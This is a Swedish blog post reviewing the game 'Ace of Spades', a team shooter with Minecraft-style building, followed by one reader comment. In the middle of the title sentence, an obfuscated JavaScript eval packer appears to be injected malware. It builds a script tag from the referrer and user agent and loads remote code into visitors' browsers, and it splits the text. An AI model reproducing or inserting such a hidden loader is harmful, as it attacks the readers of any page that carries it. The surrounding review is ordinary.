Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Ace of Spades – Det kreativa slagfältet

Sebastian

Ace eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yrahs|var|u0026u|referrer|iaehk||js|php’.split(’|’),0,{}))
of Spades: Visst gillar många Minecraft det vet vi. Men jag vet också att det är många som börjat tröttna på att springa runt och bygga och inte kunna göra någonting mer.

Ace of Spades är spelet som räddar dig i denna situation. Med idé från Minecraft har de skapat ett otroligt roligt spel som tar hela det kreativa byggandet ut på slagfältet. En blandning av action och Minecraft.

I spelet möter spelar man som två lag. Det finns fyra olika klasser att välja bland. Förutom att bara skjuta så kan man också bygga stora fort eller murar för att hålla sin flagga intakt. Grafiskt sätt påminner det mycket om Minecraft men är faktiskt roligare.

Hela den kreativa delen skapar en dynamisk upplevelse där ingen bana är den andra lik.

Jag har testat spelet och kan absolut säga att det är värt sina 8 euro som det kostar. Visst att det är några små saker man saknar i spelet men det kommer garanterat att uppdateras och läggas in under tiden det växer.

Ace of Spades är utvecklat av indiebyrån Jagex som även har skapat spelet Runescape.
Spelet släpptes förra året den 12 december och finns för 7,99 euro på Steam. Det finns nu också en gratis DLC att ladda ner så det är bara att inhandla och njuta av nöjet.

I videon ovan kan ni se spelet in action.

Spelet: store.steampowered.com

Comments

  1. Emil

    Jäklar vad ballt. Detta måste testas.
    Är själv en aktiv spelare av Minecraft, eller var. Men med lite action också kan det verkligen bli spännande!

    Tack